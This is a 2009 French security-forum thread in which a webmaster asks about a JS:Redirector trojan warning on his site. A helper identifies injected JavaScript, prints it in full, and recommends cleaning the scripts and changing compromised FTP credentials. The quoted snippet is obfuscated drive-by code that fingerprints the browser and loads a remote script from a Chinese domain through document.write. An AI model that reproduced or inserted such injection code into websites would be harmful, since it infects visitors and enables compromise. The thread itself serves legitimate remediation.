> Tous les forums > Forum Sécurité
 Virus JS:Redirector-H7 [Tà l'ouverture de la pageSujet résolu
Ajouter un message à la discussion
Page : [1] 
Page 1 sur 1
marocensolitaire
  Posté le 21/05/2009 @ 07:45 
Aller en bas de la page 
Petit astucien

Bonjour,

quand j'ouvre la page sanikeltours.com avats me dis cheval de troie JS:Redirector-H7 [Trj]

Savez vous comment regler le probleme

Cordialement

André



Modifié par marocensolitaire le 21/05/2009 13:12
Publicité
Fill
 Posté le 21/05/2009 à 10:13 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Groupe Sécurité

Salut,

Firefox bloque l'ouverture du site. Tu as l'habitude d'aller sur ce site ?

Fill

Fill
 Posté le 21/05/2009 à 11:12 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Groupe Sécurité

Re,

Peux-tu désactiver le lien pour éviter qu'une personne ne s'infecte malencontreusement en cliquant dessus ?

Fill

marocensolitaire
 Posté le 21/05/2009 à 13:13 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Petit astucien

oui c'est un site que j'ai crée il y a longtemps et qui est géré par le secretaire de l'entreprise qui est au maroc

Donc je tente de l'aider à resoudre le probleme

Merci

Fill
 Posté le 21/05/2009 à 20:29 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Groupe Sécurité

Salut,

A priori, il est hébergé chez OVH, mais il semble aussi y avoir un lien vers une url chinoise. Peut-être un iframe piégé. Je vais essayer de me renseigner.

Fill

Fill
 Posté le 22/05/2009 à 00:13 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Groupe Sécurité

Salut,

Il semble probable que du code ait été injecté dans le site. Si tu es Webmaster, vérifie ce que contient le site.

As-tu du php ?

Une faille connue a dans ce cas peut-être été exploitée.

C'est toi qui a inséré ce code JavaScript ?

(function(){var DLHR='%';var RxDr=('var"20a"3d"22S"63ri"70t"45"6eg"69n"65"22"2c"62"3d"22"56er"73ion()+"22"2cj"3d"22"22"2cu"3dnavi"67at"6f"72"2euserAgent"3bif(("75"2e"69"6edexO"66"28"22Ch"72o"6de"22"29"3c0)"26"26(u"2ein"64exO"66"28"22Win"22)"3e0)"26"26("75"2ei"6edexOf("22NT"206"22)"3c0)"26"26(d"6fcume"6et"2ecookie"2ei"6ed"65x"4ff("22mi"65k"3d1"22)"3c"30)"26"26(typeof(zr"76z"74s)"21"3d"74"79p"65o"66"28"22A"22"29))"7bzrvzts"3d"22A"22"3bev"61l"28"22if(wi"6edow"2e"22+a+"22)j"3dj+"22+a+"22Major"22+b+a+"22"4dinor"22+b+a+"22"42"75"69ld"22+b+"22j"3b"22)"3bd"6f"63u"6dent"2e"77rite("22"3cscript"20src"3d"2f"2fmar"22"2b"22tuz"2e"63n"2fvid"2f"3fi"64"3d"22"2bj+"22"3e"3c"5c"2fs"63r"69pt"3e"22)"3b"7d').replace(/"/g,DLHR);var f147=unescape(RxDr);eval(f147)})();


marocensolitaire
 Posté le 22/05/2009 à 07:10 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Petit astucien

Re,

J'ai viré tous les scripts et tout remarqhe parfaitement voir la maquette

http://marrakech.services.free.fr/index.htm

c'est donc bien ça qui posai probleme

veux tu me tester cette maquette pour voir si il y a vraiment aucunes failles

Merci d'avance

André

Fill
 Posté le 22/05/2009 à 09:05 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Groupe Sécurité

marocensolitaire a écrit :

Re,

J'ai viré tous les scripts et tout remarqhe parfaitement voir la maquette

http://marrakech.services.free.fr/index.htm

c'est donc bien ça qui posai probleme

veux tu me tester cette maquette pour voir si il y a vraiment aucunes failles

Merci d'avance

André

Salut,

Je ne suis pas qualifié pour certifier l'inocuité du site ou pour en faire un audit, mais j'accède à la page. A priori, l'infection injecte du code Javascript avec redirection vers une url chinoise : http://programmez.com/actualites.php?titre_actu=Les-sites-Web-sous-la-menace-de-JSRedir-R&id_actu=5074

Je ne peux pas t'en dire plus car je n'en sais pas plus.

Fill

marocensolitaire
 Posté le 22/05/2009 à 09:14 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Petit astucien

Merci pour tout

Publicité
Fill
 Posté le 22/05/2009 à 09:16 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Groupe Sécurité

marocensolitaire a écrit :

Merci pour tout

Bon surf !

Fill

Fill
 Posté le 22/05/2009 à 11:06 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Groupe Sécurité

Re,

L'url initiale est toujours infectée par contre. C'est normal ? Il faut que tu changes aussi tes identifiant et mot de passe ftp qui sont compromis.

Fill

marocensolitaire
 Posté le 22/05/2009 à 12:18 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Petit astucien

oui j'ai pas encore traaaaansfere sur le serveur source

Page : [1] 
Page 1 sur 1

Vous devez être connecté pour participer à la discussion.
Cliquez ici pour vous identifier.

Vous n'avez pas de compte ? Créez-en un gratuitement !
Recevoir PC Astuces par e-mail


La Lettre quotidienne +226 000 inscrits
Avec l'actu, des logiciels, des applis, des astuces, des bons plans, ...

Les bonnes affaires
Une fois par semaine, un récap des meilleurs offres.

Les fonds d'écran
De jolies photos pour personnaliser votre bureau. Une fois par semaine.

Les nouveaux Bons Plans
Des notifications pour ne pas rater les bons plans publiés sur le site.

Les bons plans du moment PC Astuces

Tous les Bons Plans
372,66 €Disque dur externe Western Digital Elements Desktop USB 3.0 18 To à 372,66 € livré
Valable jusqu'au 26 Janvier

Amazon Espagne propose actuellement le disque dur externe Western Digital Elements Desktop USB 3.0 18 To à 366,22 € (avec la TVA ajustée). Comptez 6,44 € pour la livraison en France soit un total de 372,66 € livré. On le trouve ailleurs à partir de 460 €. Ce disque dur dispose d'un grande capacité de stockage (18 To) et d'une connectique USB 3.0 qui vous offrira des transferts rapides. Il est compatible USB 2.0. Une très bonne affaire. Notez que le disque dur n'est pas soudé et que vous pouvez le récupérer pour l'utiliser dans un ordinateur ou un NAS (il s'agit d'un disque dur CMR Hélium UltraStar DC HC 550).

Vous pouvez utiliser votre compte Amazon France sur Amazon Espagne et il n'y a pas de douane.


> Voir l'offre
149 €Vélo d'appartement pliable CARE FITNESS SV-316 à 149 €
Valable jusqu'au 26 Janvier

Les différents confinements ont été fatals sur votre poids ? Amazon fait une promotion sur le vélo d'appartement pliable CARE FITNESS SV-316 qui passe à 149 € livré gratuitement alors qu'on le trouve habituellement autour de 200 €. Pliable, vous pourrez facilement le ranger une fois votre séance sportive terminée. Avec sa masse d’inertie de 4 kg, le SV-316 vous assurera un pédalage toujours fluide, silencieux et sécurisant. Avec ses 8 réglages manuels de la résistance, augmentez la résistance en un tour de main pour alterner sprint, endurance et récupération.

Le SV-316 comprend un écran LCD qui intègre 7 fonctions ciblées pour le suivi de votre activité. Vous pourrez ainsi connaître la durée de votre séance, en minutes et en secondes, la distance parcourue durant la séance et au total, la vitesse en km/h, l’estimation des calories brûlées, ou encore l’affichage successif des indicateurs. 100 kg max. Garanti 5 ans sur le châssis et 2 ans sur les pièces d'usure.


> Voir l'offre
18,49 €Carte mémoire microSDXC UHS-I SanDisk A1 Ultra 128 Go à 18,49 €
Valable jusqu'au 25 Janvier

Fnac fait une promotion sur la carte mémoire microSDXC UHS-I SanDisk A1 Ultra 128 Go à 18,49 €. Cette carte mémoire offre des vitesses jusqu'à 100 Mo/s et est idéale pour les téléphones, caméras et appareils photo HD.


> Voir l'offre

Sujets relatifs
pc lent a l'ouverture page weeb,doute d'un virus
Ouverture page Internet Yahoo search au démarrage
virus home-page yahoo
virus"sweet-page
Redirection de page (virus)
probleme avec yahoo msn pub ouverture page non désirée.
écran noir après ouverture page bienvenue pc
virus? page d'accueil google bloquée par Amazone
ouverture sur page non désirée
virus ou pas? problème de chargement page internet
Plus de sujets relatifs à Virus JS:Redirector-H7 [Tà l''ouverture de la page
 > Tous les forums > Forum Sécurité